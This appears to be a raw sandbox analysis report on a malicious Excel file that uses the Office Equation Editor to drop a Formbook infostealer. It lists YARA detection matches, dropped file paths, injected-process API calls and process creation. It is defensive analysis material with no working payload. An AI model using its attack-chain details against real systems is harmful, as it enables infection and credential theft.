          Source: 5.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 4Screenshot OCR: protected documents the yellow bar abcme 25 26 27 28 29 30 31 32 33 34 35 36 37 38 " "
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file1[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181B0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418260 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182E0 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181AA NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041825C NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182DA NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B300C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B30078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B30048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B307AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B310D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B30060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B301D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B31148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B31930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B30C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B31D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B2FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020000C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020007AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02000048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02000060 NtQuerySection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02000078 NtResumeThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020010D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0200010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02001148 NtOpenThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020001D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02001930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02000C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02001D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01FFFE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_000981B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00098260 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_000982E0 NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00098390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_000981AA NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009825C NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_000982DA NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E1008
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E1832
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E30F8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001ED908
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E8A58
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E2248
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E8368
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E0470
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E3010
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001EA0F8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001EA0EA
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E51B8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E51A8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E8A48
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E53F0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E53E1
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E1CB0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001ED5B8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E5618
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E5608
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E4E39
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E9E27
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E96F0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001EA708
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E0F58
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001EAFF0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E57E9
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001EAFE0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003D2958
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003DC510
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003D5E61
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003D2700
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0040102F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B493
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CD28
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D87
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CE77
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3E0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B6D005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B5905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B43040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3E2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BE1238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B663DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3F3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B42305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B8A37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B47353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B75485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B51489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B7D47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B5C5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B4351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B86540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B44680
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B4E6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BE2622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B4C7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BC579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B757C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BDF8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B6286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B4C85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B429B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BE098E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B569FE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BC5955
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BF3A83
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BECBA4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B3FBD7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BCDBDA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B67B00
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00BDFDDD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B70D3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B4CD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B72E2F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B5EE4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B50F3F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00B6DF7C
          Source: C:\Windows\explorer.exeCode function: 6_2_0296C2FF
          Source: C:\Windows\explorer.exeCode function: 6_2_029698F9
          Source: C:\Windows\explorer.exeCode function: 6_2_0296E062
          Source: C:\Windows\explorer.exeCode function: 6_2_029705B2
          Source: C:\Windows\explorer.exeCode function: 6_2_0296F7C7
          Source: C:\Windows\explorer.exeCode function: 6_2_02969902
          Source: C:\Windows\explorer.exeCode function: 6_2_0296C302
          Source: C:\Windows\explorer.exeCode function: 6_2_0296A362
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020B1238
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0200E2E9
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02012305
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02017353
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0205A37B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0200F3CF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020363DB
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0203D005
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02013040
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0202905A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0200E0C6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020B2622
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02014680
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0201E6C1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0209579A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0201C7BC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020457C3
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02045485
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02021489
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0201351F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0202C5F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020C3A83
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02037B00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020BCBA4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0209DBDA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0200FBD7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0201C85C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0203286D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020AF8EE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02095955
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020B098E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020129B2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020269FE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02042E2F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0202EE4C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02020F3F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0203DF7C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02040D3B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0201CD5B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_020AFDDD
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009B493
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00088C4C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00088C50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009CD28
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00082D87
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00082D90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009CE77
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00082FB0
          Source: 13-01-21.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 0200E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 0207F970 appears 81 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 0205373B appears 238 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 02053F92 appears 108 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 0200DF5C appears 107 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B83F92 appears 108 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00BAF970 appears 81 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B8373B appears 238 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B3DF5C appears 118 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B3E2A8 appears 38 times
          Source: 00000005.00000002.2208850216.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2208850216.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2378050400.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2378050400.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2378156242.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2378156242.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2208646541.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2208646541.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2208564081.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2208564081.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2378196488.00000000002A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2378196488.00000000002A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2169902354.00000000035B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2169902354.00000000035B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 00000006.00000000.2186062266.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/6@6/4
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$13-01-21.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR721.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 13-01-21.xlsxVirustotal: Detection: 30%
          Source: 13-01-21.xlsxReversingLabs: Detection: 22%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
